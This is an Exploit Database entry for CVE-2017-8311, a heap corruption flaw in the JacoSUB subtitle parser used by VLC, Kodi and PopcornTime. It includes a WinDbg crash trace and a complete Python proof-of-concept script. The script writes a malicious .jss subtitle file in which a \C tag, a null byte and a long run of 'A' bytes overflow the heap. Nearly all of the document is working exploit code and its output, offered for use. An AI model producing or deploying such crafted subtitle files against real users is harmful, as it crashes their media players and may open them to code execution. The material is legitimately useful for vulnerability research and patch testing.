VLC Media Player/Kodi/PopcornTime ‘Red Chimera’ < 2.2.5 - Memory Corruption (PoC)

• Exploit Database
• 125 阅读

• 作者： SivertPL
  日期： 2018-04-24
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/44514/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63

  """ VLC Media Player/Kodi/PopcornTime &apos;Red Chimera&apos; < 2.2.5 Memory Corruption (PoC) Author: SivertPL (kroppoloe@protonmail.ch) CVE: CVE-2017-8311   Infamous VLC/Kodi/PopcornTime subtitle attack in libsubtitle_plugin.dll. This is the Proof of Concept of the reverse engineered heap corruption vulnerability affecting JacoSUB parsing in VLC/Kodi/PopcornTime. The crash is exploitable, but hard to exploit because of various environmental constraints such as threading/mitigations/scriptless. I want to join a research team. """   """ ModLoad: 00000000<code>71660000 00000000</code>716a2000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll ModLoad: 00000000<code>71630000 00000000</code>71651000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libavi_plugin.dll ModLoad: 00000000<code>71610000 00000000</code>7162e000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libasf_plugin.dll ModLoad: 00000000<code>71600000 00000000</code>7160d000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libdemux_cdg_plugin.dll ModLoad: 00000000<code>715e0000 00000000</code>715fd000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libvobsub_plugin.dll ModLoad: 00000000<code>715d0000 00000000</code>715de000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libdemux_stl_plugin.dll ModLoad: 00000000<code>715b0000 00000000</code>715cf000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll core demux error: option sub-original-fps does not exist (33c.d10): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll - libsubtitle_plugin+0x44de: 715b44de 881fmov byte ptr [edi],blds:002b:1b9fb000=?? 0:012:x86> g (33c.d10): Access violation - code c0000005 (!!! second chance !!!) wow64!Wow64NotifyDebugger+0x1d: 00000000<code>754ac9f1 654c8b1c2530000000 mov r11,qword ptr gs:[30h] gs:00000000</code>00000030=???????????????? """   import os import struct import sys import argparse   len = 1025   def main(argv): parser = argparse.ArgumentParser() parser.add_argument("filename", help="Name of the movie file w/o extension, for generating payload") parser.add_argument("--length", help="Heap overwrite length (default 1025, may be bigger)", type=int) args = parser.parse_args() if args.length: global len len = args.length print "[+] Generating file %s.jss with overwrite size of %d" % (args.filename, len) write(args.filename, len)   def write(name, len): subtitles = open("%s.jss" % name, "w+") subtitles.write("0:00:02.00 0:00:04.00 VL red chimera..\n") subtitles.write("0:00:04.00 0:00:05.00 vm attack") subtitles.write("\\C") subtitles.write(struct.pack(&apos;B&apos;, 0)) subtitles.write(&apos;A&apos; * len) subtitles.close() print "[+] Done!"   if __name__ == "__main__": main(sys.argv[1:])